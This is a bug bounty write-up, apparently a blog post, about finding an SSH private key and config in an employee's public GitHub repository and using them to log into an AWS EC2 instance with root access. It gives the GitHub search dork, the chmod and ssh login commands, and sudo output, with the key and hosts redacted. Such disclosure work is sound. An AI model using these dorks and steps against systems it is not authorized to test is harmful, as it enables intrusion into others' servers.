WRITE UP – PRIVATE BUG BOUNTY: RCE in ec2 instance via ssh with private key exposed on public GitHub repository


Introduction:

Hi everyone It’s been a while since my last post but I’m back, I want to tell you a short story about a private bug bounty program and why you can always check public repos on GitHub, because you will be surprised.

If you like Bug Bounty writeups please check my handbook Bug Bounty Write Ups Collection


Report Summary:

Hi REDACTED COMPANY team, I have found a private key exposed and a config file for ssh in some GitHub public repo from a REDACTED COMPANY employee that lead me to perform an RCE on AWS ec2 instance.

Proof of concept:

1.- On GitHub, after some dorks (/src/github.com/redacted_company IdentityFile was the winner dork), I have found this public repository https://github.com/redacted_employee/configfiles/tree/23114…51312/ssh/ that contains 2 files, config and pkey.pem file:

config file:

config: 
Host devenv
	HostName X.X.X.X
	User ec2-user
	Port 22
	IdentityFile ~/configfiles/ssh/pkey.pem
pkey.pem: (private key)

pkey.pem file:

-----BEGIN RSA PRIVATE KEY-----
  - - - R E D A C T E D - - -
SSBkb24ndCBrbm93IGFueW1vcmUNCkFyZSB0aGUgbmVpZ2hib3JzIHdhdGNoaW5nIG1lPyAoV2hvJ3Mgd2F0Y2hpbmc/KQ0KV2VsbCwgaXMgdGhlIG1haWxtYW4gd2F0Y2hpbmcgbWU/IChUZWxsIG1lLCB3aG8ncyB3YXRjaGluZz8pDQpBbmQgSSBkb24ndCBmZWVsIHNhZmUgYW55bW9yZSwgb2gsIHdoYXQgYSBtZXNzDQpJIHdvbmRlciB3aG8ncyB3YXRjaGluZyBtZSBub3cgKHdobz8pLCB0aGUgSVJTPw==
  - - - R E D A C T E D - - -
-----END RSA PRIVATE KEY-----

2.- Then with any ssh client you just need to run: 

# X.X.X.X was the IP of the Host that appears in the config file
# you need to save the pkey.pem and change the key file permissions
# with chmod 600 pkey.pem
omespino@h0st:~# chmod 600 pkey.pem
omespino@h0st:~# ssh -i pkey.pem ec2-user@X.X.X.X

3.- Once I got access I executed sudo su and id in order to confirm the admin privileges and we got root:

[ec2-user@ip-172-X-X-X ~]$ sudo su
root@ip-ip-172-X-X-X:/home/ec2-user# id
uid=0(root) gid=0(root) groups=0(root)


Environment and tools:

Any ssh client
My IP was X.X.X.X and I executed the sudo su and id commands to fingerprint the users and privileges and logged out immediately and I started to write this report, according to program terms no steps deeper were taken.

Impact:

The attacker can gain access to this ec2 instance and perform arbitrary commands as root.

Well that’s it, share your thoughts, what do you think about how they handle that security issue? If you have any doubt, comments or suggestions just drop me a line here or on Twitter @omespino, read you later.

Leave a Reply

Your email address will not be published.